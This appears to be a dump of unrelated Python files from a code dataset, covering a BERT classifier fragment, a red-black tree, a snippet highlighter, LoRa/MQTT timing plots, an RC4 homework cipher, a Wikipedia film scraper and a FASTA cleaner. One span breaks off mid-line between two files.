self.accuracy.get_metric(reset)}\n\n @overrides\n def decode(self, output_dict: Dict[str, torch.Tensor]) -> Dict[str, torch.Tensor]:\n \"\"\"\n Does a simple argmax over the class probabilities, converts indices to string labels, and\n adds a ``\"label\"`` key to the dictionary with the result.\n \"\"\"\n class_probabilities = F.softmax(output_dict['logits'], dim=-1)\n output_dict['class_probabilities'] = class_probabilities\n\n predictions = class_probabilities.cpu().data.numpy()\n argmax_indices = np.argmax(predictions, axis=-1)\n labels = [self.vocab.get_token_from_index(x, namespace=\"labels\")\n for x in argmax_indices]\n output_dict['label'] = labels\n return output_dict\n\n\ndef print_shape(name, x):\n print(f'{name} has shape {x.shape}')","sub_path":"scene/ml/models/bert.py","file_name":"bert.py","file_ext":"py","file_size_in_byte":4681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"392662514","text":"class Node:\n RED = True\n BLACK = False\n\n def __init__(self, id: int, key, color: bool = RED):\n self.color = color\n self.key = key\n self.left = self.right = self.parent = NilNode.instance()\n self.id = id\n\n def __str__(self, level: int = 0, indent: str = \" \") -> str:\n left_id = \"Nil\" if not self.left else self.left.id\n right_id = \"Nil\" if not self.right else self.right.id\n parent_id = \"Nil\" if not self.parent else self.parent.id\n return f\"Node(id={self.id}, parent={parent_id}, left={left_id}, right={right_id}, 
red={self.color})\"\n\n def __nonzero__(self):\n return True\n\n def __bool__(self):\n return True\n\n def is_red(self) -> bool:\n return self.color == Node.RED\n\n\nclass NilNode(Node):\n __instance__ = None\n\n @classmethod\n def instance(self):\n if self.__instance__ is None:\n self.__instance__ = NilNode()\n return self.__instance__\n\n def __init__(self):\n self.color = Node.BLACK\n self.key = None\n self.left = self.right = self.parent = None\n\n def __nonzero__(self):\n return False\n\n def __bool__(self):\n return False\n\n def is_red(self) -> bool:\n return False\n\nclass BinarySearchTree:\n def __init__(self):\n self.root = NilNode.instance()\n self.size = 0\n self.control = {}\n\n def __str__helper(self, node: Node, level: int = 0, indent: str = \" \"):\n s = level * indent + str(node)\n if node.left:\n s += \"\\n\" + self.__str__helper(node.left, level + 1, indent)\n if node.right:\n s += \"\\n\" + self.__str__helper(node.right, level + 1, indent)\n return s\n\n def __str__(self, indent: str = \" \"):\n if not self.root:\n return \"(root.size = 0, balanced = True)\\n(Empty tree)\"\n res, _ = self.is_rbt()\n return f\"(root.size = {self.size}, RBT = {res})\\n\" + \\\n self.__str__helper(self.root, indent=indent)\n\n def is_empty(self) -> bool:\n return bool(self.root)\n\n def insert(self, id: int, key):\n new_node = Node(id, key)\n self.control[new_node.id] = new_node\n self.root = self.__insert(self.root, new_node)\n self.root.parent = NilNode.instance()\n self.__insert_balance(new_node)\n self.size += 1\n\n res, err = self.is_rbt()\n if not res:\n print(str(self))\n raise Exception(err)\n\n def __insert(self, act_node, new_node: Node) -> Node:\n if not act_node:\n return new_node\n\n if new_node.key < act_node.key:\n act_node.left = self.__insert(act_node.left, new_node)\n act_node.left.parent = act_node\n else:\n act_node.right = self.__insert(act_node.right, new_node)\n act_node.right.parent = act_node\n\n return act_node\n\n def __insert_balance(self, node: Node):\n while node != self.root and node.parent.is_red():\n parent = node.parent\n if parent == parent.parent.left:\n uncle = parent.parent.right\n if uncle and uncle.is_red():\n node = parent.parent\n self.__flip_colors(node)\n else:\n if node == parent.right:\n node = parent\n self.__rotate_left(node)\n self.__rotate_right(node.parent.parent)\n else:\n uncle = parent.parent.left\n if uncle and uncle.is_red():\n node = parent.parent\n self.__flip_colors(node)\n else:\n if node == parent.left:\n node = parent\n self.__rotate_right(node)\n self.__rotate_left(node.parent.parent)\n self.root.color = Node.BLACK\n\n def delete(self, id: int) -> Node:\n if not (id in self.control):\n return\n\n old = self.control[id]\n del self.control[id]\n\n if old.left and old.right:\n new_old = self.__successor(old)\n old.key = new_old.key\n old.id = new_old.id\n self.control[old.id] = old\n old = new_old\n\n child = old.right if not old.left else old.left\n child.parent = old.parent\n if old == old.parent.left:\n old.parent.left = child\n elif old == old.parent.right:\n old.parent.right = child\n else:\n self.root = child\n\n if not old.is_red():\n if child.is_red():\n child.color = Node.BLACK\n else:\n self.__delete_balance(child)\n\n self.size -= 1\n\n res, err = self.is_rbt()\n if not res:\n print(str(self))\n raise Exception(err)\n return old\n\n def __delete_balance(self, node):\n if self.root == node or node.is_red():\n node.color = Node.BLACK\n return\n left = (node == node.parent.left)\n parent = node.parent\n sibling = 
node.parent.right if left else node.parent.left\n if sibling.is_red():\n if left:\n self.__rotate_left(parent)\n sibling = parent.right\n else:\n self.__rotate_right(parent)\n sibling = parent.left\n if not sibling.right.is_red() and not sibling.left.is_red():\n sibling.color = Node.RED\n self.__delete_balance(parent)\n else:\n if left:\n if not sibling.right.is_red():\n self.__rotate_right(sibling)\n sibling = parent.right\n self.__rotate_left(parent)\n else:\n if not sibling.left.is_red():\n self.__rotate_left(sibling)\n sibling = parent.left\n self.__rotate_right(parent)\n sibling.left.color = Node.BLACK\n sibling.right.color = Node.BLACK\n\n def minimum(self, node = None):\n if node is None: node = self.root\n while node.left:\n node = node.left\n return node\n\n def maximum(self, node = None):\n if node is None: node = self.root\n while node.right:\n node = node.right\n return node\n\n def __successor(self, node: Node):\n if node.right:\n return self.minimum(node.right)\n parent = node.parent\n while parent and node == parent.right:\n node, parent = parent, parent.parent\n return parent\n\n def __rotate_right(self, node: Node):\n child = node.left\n node.left = child.right\n child.right = node\n child.color = child.right.color\n child.right.color = Node.RED\n child.parent = node.parent\n node.parent = child\n if node.left: node.left.parent = node\n if child.parent.left == node:\n child.parent.left = child\n elif child.parent.right == node:\n child.parent.right = child\n else:\n self.root = child\n\n def __rotate_left(self, node: Node):\n child = node.right\n node.right = child.left\n child.left = node\n child.color = child.left.color\n child.left.color = Node.RED\n child.parent = node.parent\n node.parent = child\n if node.right: node.right.parent = node\n if child.parent.left == node:\n child.parent.left = child\n elif child.parent.right == node:\n child.parent.right = child\n else:\n self.root = child\n\n def __flip_colors(self, node: Node):\n node.color = not node.color\n node.left.color = not node.left.color\n node.right.color = not node.right.color\n\n def is_rbt(self) -> tuple:\n if not self.root:\n return (True, \"\")\n node = self.root\n final_blacks = 1\n while node:\n node = node.right\n if not node.is_red():\n final_blacks += 1\n errors, ids = self.__is_rbt(self.root, 0, final_blacks)\n if errors == 0:\n return (True, \"\")\n elif errors == 1:\n return (False, f\"Tree is not balanced on ids {ids}\")\n elif errors == 2:\n return (False, f\"Tree has double red nodes on ids {ids}\")\n return (False, f\"Tree is not balanced and has double red nodes on ids {ids}\")\n\n def __is_rbt(self, node, blacks: int, final_blacks: int):\n if not node.is_red():\n blacks += 1\n elif node.left.is_red() or node.right.is_red():\n return (2, [node.id])\n if not node:\n return (0, []) if blacks == final_blacks else (1, [-1])\n lerr, lids = self.__is_rbt(node.left, blacks, final_blacks)\n rerr, rids = self.__is_rbt(node.right, blacks, final_blacks)\n if lerr != 0 and rerr != 0:\n return (lerr ^ rerr, lids + rids)\n if lerr != 0:\n return (lerr, lids)\n if rerr != 0:\n return (rerr, rids)\n return (0, [])\n","sub_path":"geocomp/point_visibility/binary_search_tree.py","file_name":"binary_search_tree.py","file_ext":"py","file_size_in_byte":9081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"237844603","text":"#/usr/bin/python\n# -*- coding: utf-8 -*-\ndef parse_document(filename):\n \"\"\"\n Args:\n filename - filename of document to parse\n 
\n Returns:\n doc - A string for further analysis\n \"\"\"\n with open(filename) as document:\n for doc in document:\n return doc\n \ndef split_document_on_delimiter(input_doc,**kwargs):\n \"\"\"\n Args:\n input_doc - the string of the document in its entirety\n **kwargs:\n delimter - How to split the string\n default delimiter is '.'\n \n Returns:\n doc - array of strings split upon the specified delimiter\n \n \"\"\"\n doc = []\n if kwargs:\n if 'delimiter' in kwargs:\n delim = kwargs['delimiter']\n else:\n delim = \".\"\n \n for ele in input_doc.split(delim):\n if ele:\n doc.append(ele.lstrip())\n return doc\n\ndef find_matches_per_sentence(split_sentence,query):\n \"\"\"\n Args:\n split_sentence - A split sentence with sub strings to check with query\n query - A query split to check if it is substring of the sentence.\n \n Returns:\n sentence_array - Returns the split sentence with highlighting if a query word is found.\n \n \"\"\"\n ##split the sentence and query strings to interate over\n ##also make all words in the query lowercase to make matching words case insenstive.\n split_queries = query.split()\n split_queries = [ele.lower() for ele in split_queries]\n sentence_array = []\n\n counter = 0\n for i,word in enumerate(split_sentence):\n if word.lower() in split_queries:\n sentence_array.append(word)\n counter+=1\n if counter==1:\n sentence_array.insert(-1,\"[[HIGHLIGHT]]\")\n else:\n sentence_array.append(word)\n\n if counter!=0:\n sentence_array.insert(-1,\"[[ENDHIGHLIGHT]]\")\n counter = 0\n \n ##To check if the last word is a query word we use the counter as \n ##a descriminant i.e. counter = 0 implies last word was not in the query set\n ##so we don't add a final ENDHIGHLIGHT. \n if counter!=0:\n sentence_array.append(\"[[ENDHIGHLIGHT]]\")\n\n return sentence_array\n \ndef highlight_doc(input_doc,query,**kwargs):\n \"\"\"\n highlight_doc(args,kwargs)\n Analysises a document looking for query words and highlights them. At the moment \n the code is not smart with respect to standard connecting words such as e.g. \"a\" \"and\",\"the\" etc\n and will highlight them as singles i.e. blah [[HIGHLIGHT]] a [[ENDHIGHLIGHT]] blah.\n \n Args:\n input_doc - Document to be highlight \n query - The search query (string) \n \n Options:\n output_length - maximum length of the snippet. This is an upper limit unless there is \n an open highlighting token present i.e. 
\"[[HIGHLIGHT]] query1 query2 [[ENDHIGHLIGHT]]\"\n will always result in \"[[HIGHLIGHT]] query1 query2 [[ENDHIGHLIGHT]]\"\n \n Returns:\n The most relevant snippet with the query terms highlighted (string)\n \"\"\" \n \n ##set default word_output_limit if defined in the options then we overide this ##value\n word_limit_of_snippet = 34\n source_type = False\n if kwargs:\n if \"output_length\" in kwargs:\n word_limit_of_snippet = kwargs[\"output_length\"]\n if \"source_type\" in kwargs:\n source_type = kwargs[\"source_type\"]\n \n ##If text file is provided then we have to process the txt file to a string for ##processing.\n if source_type:\n input_doc = parse_document(input_doc)\n \n doc = split_document_on_delimiter(input_doc,delimiter=\".\")\n \n \"\"\"\n Intialise the various counters and booleans for ensuring the correct snippet lengths and \n heuristics for the snippet.\n \"\"\"\n number_of_words_in_snippet = total_ouput_length = 0\n first_sentence_with_match = False\n highlight_process_flag = True\n snippet = \"\"\n \n for sentence in doc:\n split_sentence = sentence.split()\n processed_sentence = find_matches_per_sentence(split_sentence,query)\n length_of_intial_sentence = len(split_sentence)\n length_of_processed_sentence = len(processed_sentence)\n \n #check that the snippet length is less than defined snippet output length.\n if total_ouput_length + length_of_processed_sentence <=word_limit_of_snippet:\n if length_of_processed_sentence>length_of_intial_sentence:\n first_sentence_with_match = True\n snippet+= \" \".join(processed_sentence)\n snippet+=\". \"\n total_ouput_length+=length_of_processed_sentence\n else:\n for i,word in enumerate(processed_sentence):\n #since python is 0 index language we need to +1 to make sure that the length of \n #snippet computes correctly.\n i+=1\n if word == \"[[HIGHLIGHT]]\":\n highlight_process_flag = True\n if word == \"[[ENDHIGHLIGHT]]\":\n highlight_process_flag = False\n if i+total_ouput_length DR4')\n\ndef fileExists(file):\n if os.path.exists(file):\n print(\"file:%s found\\n\"%file)\n return 1\n else:\n print(\"File:%s not found\\n\"%file)\n return -1\n\n\ndef parserFunct(file):\n\tregex2 = r'(.*)Device ID:(.*)'\n\tregex3 = r'(.*)Msg Time: (.*)'\n\tdev2 = []\n\tdev1 = []\n\n\tval1 = []\n\tval2 = []\n\titr1 = 0\n\titr2 = 0\n\n\tif fileExists(file) != -1:\n\t\twith open(file,'r') as file:\n\t\t\tfor line in file:\n\t\t\t\tif \"00-80-00-00-00-00-fe-37\" in line:\n\t\t\t\t\tobj = re.search(regex3,line,re.M|re.I)\n\t\t\t\t\t#print(obj);\n\t\t\t\t\tres = obj.group(2);\n\t\t\t\t\t# print(\"res.split()[0]:{}\".format(res.split()[0]))\n\t\t\t\t\ttp = dp.parse(res.split()[0])\n\t\t\t\t\tt_sec = tp.strftime('%s')\n\t\t\t\t\tdev1.append(t_sec)\n\t\t\t\t\titr1 += 1\n\t\t\t\telif \"00-80-00-00-00-00-fe-36\" in line:\n\t\t\t\t\tobj = re.search(regex3,line,re.M|re.I)\n\t\t\t\t\t#print(obj);\n\t\t\t\t\tres = obj.group(2);\n\t\t\t\t\t# print(\"res.split()[0]:{}\".format(res))\n\t\t\t\t\ttp = dp.parse(res.split()[0])\n\t\t\t\t\tt_sec = tp.strftime('%s')\n\t\t\t\t\tdev2.append(t_sec)\n\t\t\t\t\titr2 += 1\n\t\treturn dev1,dev2\n\telse:\n\t\treturn False\n\n'''\n# this is for the toa item in the marconi log file\n'''\ndef parserFunctToa(file,devList):\n\n\tregex_dev_toa = r'(.*)TOA:(.*)'\n\n\tdev1_val = []\n\tdev2_val = []\n\t#time_val = []\n\titr = 0;\n\tif fileExists(file) != -1:\n\t\twith open(file,'r') as file:\n\t\t\tfor line in file:\n\t\t\t\tif devList[0] in line and \"TOA\" in line:\n\t\t\t\t\tobj = 
re.search(regex_dev_msg_rx,line,re.M|re.I)\n\t\t\t\t\tres = obj.group(2)\n\t\t\t\t\tdev1_val.append(int(res.split()[0]))\n\t\t\t\telif devList[1] in line and \"TOA\" in line:\n\t\t\t\t\t#elif devList[1] in line and \"TOA\" in line:\n\t\t\t\t\t#obj = re.search(regex_dev_toa,line,re.M|re.I)\n\t\t\t\t\tobj = re.search(regex_dev_msg_rx,line,re.M|re.I)\n\t\t\t\t\tres = obj.group(2)\n\t\t\t\t\tdev2_val.append(int(res.split()[0]))\n\t\treturn (dev1_val,dev2_val)\n\telse:\n\t\treturn False\n\n'''\nTo plot the mqtt_sub timestamps\n'''\ndef creatTimeList(file,devEUIs):\n\tregex_dev_sub_time = r'(.*)Msg Time:(.*)'\n\n\ttimeList_dev1 = []\n\ttimeList_dev2 = []\n\n\titr = 0\n\titr2 = 0\n\tval = 0\n\n\twith open(file,'r') as fp:\n\t\tfor line in fp:\n\t\t\tif devEUIs[0] in line:\n\t\t\t\tobj = re.search(regex_dev_sub_time,line,re.M|re.I)\n\t\t\t\tres = obj.group(2)\n\n\t\t\t\ttimeList_dev1.append(int(res.split()[0]))\n\t\t\t\tif itr == 0:\n\t\t\t\t\tval = timeList_dev1[0]\n\t\t\t\t#print(\"dev:{}\".format(res.split()[0]))\n\t\t\t\ttimeList_dev1[itr] -= val\n\t\t\t\titr += 1\n\n\t\t\telif devEUIs[1] in line:\n\t\t\t\tobj = re.search(regex_dev_sub_time,line,re.M|re.I)\n\t\t\t\tres = obj.group(2)\n\t\t\t\ttimeList_dev2.append(int(res.split()[0]))\n\t\t\t\tif itr2 == 0:\n\t\t\t\t\tval = timeList_dev2[0]\n\t\t\t\ttimeList_dev2[itr2] -= val\n\t\t\t\titr2 += 1\n\n\treturn timeList_dev1,timeList_dev2\n\ndef plot(filePath,devEUIs,yax,sf37,sf36):\n\tretFlag = 0\n\t#retFlag += fileExists(filePath[0])\n\tretFlag += fileExists(filePath[1])\n\n\tif retFlag < 1:\n\t\treturn -1\n\n\t#timeList1 = creatTimeList(filePath[0])\n\ttimeList_dev1,timeList_dev2 = creatTimeList(filePath[1],devEUIs)\n\n\t#timeList1 = np.array(timeList1)\n\ttimeList_dev1 = np.array(timeList_dev1)\n\ttimeList_dev2 = np.array(timeList_dev2)\n\n\ty_axis1 = np.array([yax[0] for i in range(len(timeList_dev1))])\n\ty_axis2 = np.array([yax[1] for i in range(len(timeList_dev2))])\n\n\tlb1 = 'mqtt sub(marconi) Dev:008000000000fe37' + ' ' + sf37\n\tlb2 = 'mqtt sub(marconi) Dev:008000000000fe36' + ' ' + sf36\n\t#fig = plt.figure(figsize=(18, 16), dpi= 100, facecolor='w', edgecolor='k')\n\t# fig = plt.figure()\n\n\t#fig.canvas.draw()\n\tplt.plot(timeList_dev1[:20], y_axis1[:20], color='r', linestyle='None', markersize = 10.0)\n\tplt.scatter(timeList_dev1[:20],y_axis1[:20],label = lb1 ,color='c')\n\tplt.plot(timeList_dev2[:20], y_axis2[:20], color='b', linestyle='None', markersize = 10.0)\n\t#plt.scatter(timeList_dev2[:20],y_axis2[:20], label = 'mqtt sub(marconi) Dev:0080000004009802',color='r')\n\tif 'NULL' not in sf36:\n\t\tplt.scatter(timeList_dev2[:20],y_axis2[:20], label = lb2,color='r')\n\n\treturn timeList_dev1,timeList_dev2\n\n\nif __name__ == '__main__':\n\n\tfilePath1 = ['/home/iot/Desktop/testJuypter/test0422/gw_tmst_0422_dr0dr1_11b.txt','/home/iot/Desktop/testJuypter/test0422/log_mqtt_marconi_sub_0422_dr0dr1_11b.txt']\n\tfilePath2 = ['/home/iot/Desktop/testJuypter/test0422/gw_tmst_0422_dr2dr3_11b.txt','/home/iot/Desktop/testJuypter/test0422/log_mqtt_marconi_sub_0422_dr2dr3_11b.txt']\n\tfilePath3 = ['/home/iot/Desktop/testJuypter/test0422/gw_tmst_0422_dr4_11b.txt','/home/iot/Desktop/testJuypter/test0422/log_mqtt_marconi_sub_0422_dr4_11b.txt']\n\n\tdevEUIs = ['00-80-00-00-00-00-fe-37','00-80-00-00-00-00-fe-36']\n\taxis_sub = [1,3]\n\taxis_gw = [2,4]\n\n\tfig = plt.figure()\n\tret1,ret2 = plot(filePath1,devEUIs,[1,3],'SF10','SF9') # mqtt sub/pub plot\n\tplot_predicted(filePath1,ret1,ret2,[2,4],'SF10','SF9')\n\tret1,ret2 = plot(filePath2,devEUIs,[7,5],'SF7','SF8') # mqtt sub/pub 
plot\n\tplot_predicted(filePath2,ret1,ret2,[8,6],'SF7','SF8')\n\tret1,ret2 = plot(filePath3,devEUIs,[9,0],'SF8BW500','NULL') # mqtt sub/pub plot\n\tplot_predicted(filePath3,ret1,ret2,[10,0],'SF8BW500','NULL')\n\n\tplt.rcParams.update({'font.size': 12})\n\tplt.title('Gateway Rx Time vs mqtt sub(marconi) time for dev:008000000000fe36 and dev:008000000000fe37 @11B PL operating at different Data Rates [DR0-DR4]')\n\tplt.rcParams.update({'font.size': 16})\n\ttext_str = 'Data Transfer Path: mdot Tx -> Gateway Rx -> Gateway MQTT pub -> marconi MQTT sub\\n'\n\tfig.text(.5,0.01,text_str,wrap=True,ha='center')\n\n\tplt.gca().legend(loc='best')\n\tplt.gca().yaxis.set_major_locator (plt.NullLocator())\n\tplt.grid(True)\n\tplt.show()\n","sub_path":"test_and_plots_0422/plotGwRxMqttSub_11b.py","file_name":"plotGwRxMqttSub_11b.py","file_ext":"py","file_size_in_byte":7959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"302453354","text":"t = int(input())\nfor i in range(t):\n inp = input()\n flaga = False\n flagb = False\n flagc = False\n for j in inp:\n if(j == 'c'):\n flagc = True\n if(j == 'a'):\n flaga = True\n if(j == 'b'):\n flagb = True\n if(flaga and flagb and flagc):\n if(len(inp) == 4):\n print(3)\n elif(len(inp) == 6):\n print(7)\n else:\n print(1)\n else:\n print(0)\n ","sub_path":"Code/CodeRecords/2674/47920/283694.py","file_name":"283694.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"103700205","text":"#!/usr/bin/env python2.7\n\n# HW 5\n# Eric Murphy\n# murph141\n# 2/24/15\n\n# Imports\nimport sys\nimport os\nfrom copy import deepcopy\n\nsys.path.append( \"../BitVector/\" )\n\nfrom BitVector import *\n\noriginalImage = 'Tiger2.ppm'\nencryptedImage = 'Encrypted.ppm'\ndecryptedImage = 'Decrypted.ppm'\n\nclass RC4():\n def __init__(self, key):\n self.header = \"\"\n\n T_table = [ord(key[a % len(key)]) for a in range(256)]\n S = [x for x in range(256)]\n\n j = 0\n for i in range(256):\n j = (j + S[i] + T_table[i]) % 256\n S[i], S[j] = S[j], S[i]\n\n self.S = S\n \n\n def encrypt(self, image):\n self.header = \"\"\n\n with open(image, 'rb') as f:\n for l in range(5):\n self.header = self.header + f.readline()\n\n data = f.read()\n\n output = \"\"\n\n i = 0\n j = 0\n\n Q = deepcopy(self.S)\n\n for char in data:\n i = (i + 1) % 256\n j = (j + Q[i]) % 256\n Q[i], Q[j] = Q[j], Q[i]\n k = (Q[i] + Q[j]) % 256\n output = output + chr(Q[k] ^ ord(char))\n\n f = open(encryptedImage, \"wb\")\n \n f.write(self.header)\n\n f.write(output)\n\n f.close()\n\n\n def decrypt(self, image):\n self.header = \"\"\n\n with open(image, 'rb') as f:\n for l in range(5):\n self.header = self.header + f.readline()\n\n data = f.read()\n\n output = \"\"\n\n i = 0\n j = 0\n\n Q = deepcopy(self.S)\n\n for char in data:\n i = (i + 1) % 256\n j = (j + Q[i]) % 256\n Q[i], Q[j] = Q[j], Q[i]\n k = (Q[i] + Q[j]) % 256\n output = output + chr(Q[k] ^ ord(char))\n\n f = open(decryptedImage, \"wb\")\n \n f.write(self.header)\n\n f.write(output)\n\n f.close()\n\n\nif __name__ == \"__main__\":\n rc = RC4('123451234512345')\n rc.encrypt(originalImage)\n rc.decrypt(encryptedImage)\n","sub_path":"HW05/bak.py","file_name":"bak.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"306264599","text":"import csv \nfrom urllib.request import urlopen \nfrom bs4 import BeautifulSoup\nimport 
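The RC4 record above repeats the same keystream loop in both `encrypt` and `decrypt`; because RC4 is an XOR stream cipher, the two operations are identical and can share one helper. A minimal sketch of that refactoring (the name `rc4_apply` is hypothetical, not from the original file):

```python
from copy import deepcopy

def rc4_apply(S, data):
    # RC4 PRGA over `data`; XOR is its own inverse, so calling this
    # twice with the same key-scheduled state S round-trips the bytes.
    Q = deepcopy(S)  # preserve the scheduled state for reuse
    i = j = 0
    out = []
    for char in data:
        i = (i + 1) % 256
        j = (j + Q[i]) % 256
        Q[i], Q[j] = Q[j], Q[i]
        k = (Q[i] + Q[j]) % 256
        out.append(chr(Q[k] ^ ord(char)))
    return "".join(out)

# round trip: rc4_apply(S, rc4_apply(S, plaintext)) == plaintext
```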
re\n\nstartYear = 2011\nendYear = 2015\n\ndef monthToNum(month):\n\tif month == \"JANUARY\":\n\t\treturn 1\n\tif month == \"FEBRUARY\":\n\t\treturn 2\n\tif month == \"MARCH\":\n\t\treturn 3\n\tif month == \"APRIL\":\n\t\treturn 4\n\tif month == \"MAY\":\n\t\treturn 5\n\tif month == \"JUNE\":\n\t\treturn 6\n\tif month == \"JULY\":\n\t\treturn 7\n\tif month == \"AUGUST\":\n\t\treturn 8\n\tif month == \"SEPTEMBER\":\n\t\treturn 9\n\tif month == \"OCTOBER\":\n\t\treturn 10\n\tif month == \"NOVEMBER\":\n\t\treturn 11\n\tif month == \"DECEMBER\":\n\t\treturn 12\n\treturn month\n\ndef cellsToArray7(cells, monthCell, dayCell):\n\tcsvRow = []\n\n\tif len(cells) == 7:\n\t\tmonthCell = monthToNum(cells[0].get_text().replace('\\n',\"\"))\n\t\tdayCell = cells[1].get_text()\n\t\tcsvRow.append(year)\n\tif len(cells) == 6:\n\t\tdayCell = cells[0].get_text()\n\t\tcsvRow.append(year)\n\t\tcsvRow.append(monthCell)\n\tif len(cells) == 5:\n\t\tcsvRow.append(year)\n\t\tcsvRow.append(monthCell)\n\t\tcsvRow.append(dayCell)\n\n\tfor cell in cells:\n\t\tformattedRow = monthToNum(cell.get_text().replace('\\n',\"\"))\n\t\tcsvRow.append(formattedRow)\n\n\treturn {\"csvRow\": csvRow, \"monthCell\": monthCell, \"dayCell\": dayCell}\n\ndef cellsToArray8(cells, monthCell, dayCell):\n\tcsvRow = []\n\n\tif len(cells) == 9:\n\t\tmonthCell = monthToNum(cells[0].get_text().replace('\\n',\"\"))\n\t\tdayCell = cells[1].get_text()\n\t\tcsvRow.append(year)\n\t\tcsvRow.append(monthCell)\n\t\tcsvRow.append(dayCell)\n\t\tcsvRow.append(cells[3].get_text())\n\t\tcsvRow.append(cells[4].get_text())\n\t\tcsvRow.append(cells[5].get_text())\n\t\tcsvRow.append(cells[6].get_text()+\", \"+cells[7].get_text())\n\tif len(cells) == 8:\n\t\tdayCell = cells[0].get_text()\n\t\tcsvRow.append(year)\n\t\tcsvRow.append(monthCell)\n\t\tcsvRow.append(dayCell)\n\t\tcsvRow.append(cells[2].get_text())\n\t\tcsvRow.append(cells[3].get_text())\n\t\tcsvRow.append(cells[4].get_text())\n\t\tcsvRow.append(cells[5].get_text()+\", \"+cells[6].get_text())\n\tif len(cells) == 7:\n\t\tcsvRow.append(year)\n\t\tcsvRow.append(monthCell)\n\t\tcsvRow.append(dayCell)\n\t\tcsvRow.append(cells[1].get_text())\n\t\tcsvRow.append(cells[2].get_text())\n\t\tcsvRow.append(cells[3].get_text())\n\t\tcsvRow.append(cells[4].get_text()+\", \"+cells[5].get_text())\n\tif len(cells) == 6:\n\t\tcsvRow.append(year)\n\t\tcsvRow.append(monthCell)\n\t\tcsvRow.append(dayCell)\n\t\tcsvRow.append(cells[0].get_text())\n\t\tcsvRow.append(cells[1].get_text())\n\t\tcsvRow.append(cells[2].get_text())\n\t\tcsvRow.append(cells[3].get_text()+\", \"+cells[4].get_text())\n\n\treturn {\"csvRow\": csvRow, \"monthCell\": monthCell, \"dayCell\": dayCell}\n\nyears = list(range(startYear,endYear+1))\n\ncsvFile = open(\"./film2.csv\", 'wt') \nwriter = csv.writer(csvFile)\n\nfor year in years:\n\tprint(\"Starting year \"+str(year)+\"...\")\n\thtml = urlopen(\"https://en.wikipedia.org/wiki/\"+str(year)+\"_in_film\") \n\tbsObj = BeautifulSoup(html, \"html.parser\") \n\t#The main comparison table is currently the first table on the page \n\ttables = []\n\ttable = bsObj.find(\"span\",{\"id\":re.compile(\"[0-9][0-9][0-9][0-9]_films\")}).parent.findNext(\"table\",{\"class\":\"wikitable\"})\n\twhile table is not None:\n\t\ttables.append(table)\n\t\ttable = table.findNext(\"table\",{\"class\":\"wikitable\"})\n\n\tallrows =[]\n\tfor table in tables:\n\t\trows = table.findAll(\"tr\")\n\t\tfor row in rows:\n\t\t\tallrows.append(row)\n\n\tmonthCell = \"\"\n\tdayCell = \"\"\n\tfor row in allrows:\n\t\tcells = row.findAll(['td', 
'th'])\n\t\t\n\t\tcsvRow = []\n\t\tif year == 2012:\n\t\t\treturnedTuple = cellsToArray8(cells, monthCell, dayCell)\n\t\t\tcsvRow = returnedTuple[\"csvRow\"]\n\t\t\tmonthCell = returnedTuple[\"monthCell\"]\n\t\t\tdayCell = returnedTuple[\"dayCell\"]\n\t\telse:\n\t\t\treturnedTuple = cellsToArray7(cells, monthCell, dayCell)\n\t\t\tcsvRow = returnedTuple[\"csvRow\"]\n\t\t\tmonthCell = returnedTuple[\"monthCell\"]\n\t\t\tdayCell = returnedTuple[\"dayCell\"]\n\n\t\tif len(csvRow) >= 2:\n\t\t\tif csvRow[2] == 'Opening':\n\t\t\t\tif year == years[0] and row is allrows[0]:\n\t\t\t\t\tcsvRow[0]=\"\"\n\t\t\t\t\ttry:\n\t\t\t\t\t\twriter.writerow(csvRow) \n\t\t\t\t\texcept: \n\t\t\t\t\t\tcsvFile.close()\n\t\t\telse:\n\t\t\t\ttry:\n\t\t\t\t\twriter.writerow(csvRow)\n\t\t\t\texcept:\n\t\t\t\t\tcsvFile.close()\t\nprint(\"Done.\")\ncsvFile.close()","sub_path":"scrapeFilms2015.py","file_name":"scrapeFilms2015.py","file_ext":"py","file_size_in_byte":3981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"514236190","text":"from Bio import SeqIO, SeqRecord\nimport sys, os\n\ndef remove_sequences_with_nonbases(infile):\n bases = ['A', 'C', 'T', 'G', 'a', 'c', 't', 'g']\n in_handle = open(infile, \"r\")\n records = list(SeqIO.parse(in_handle, \"fasta\"))\n new_records = []\n for record in records:\n keep = True\n for base in record.seq:\n if base not in bases:\n keep = False\n break\n if keep:\n new_records.append(record)\n\n SeqIO.write(new_records, 'cleaned_nucleotide.fasta', 'fasta')\n\n return 0\n\ndef main():\n infile = sys.argv[1]\n remove_sequences_with_nonbases(infile)\n\nmain()\n","sub_path":"sequence_data/17/remove_noncanonical_bases.py","file_name":"remove_noncanonical_bases.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"47035168","text":"# print('Hey!')\n# print('I don\\'t know your name')\n# name = input(\"What is your name? - \")\n# print('Happy to see you,', name)\n#\n# usd = 23\n#\n# number = int(input('How many you want to exchange? 
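The base-by-base flag loop in `remove_sequences_with_nonbases` above can be expressed as a set-subset test; a sketch of the equivalent filter (assumes Biopython's `SeqIO`, as imported in that record):

```python
from Bio import SeqIO

CANONICAL = set("ACGTacgt")

def keep_canonical(infile, outfile="cleaned_nucleotide.fasta"):
    # a record survives only if every base is a canonical DNA base
    kept = (r for r in SeqIO.parse(infile, "fasta")
            if set(str(r.seq)) <= CANONICAL)
    SeqIO.write(kept, outfile, "fasta")
```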
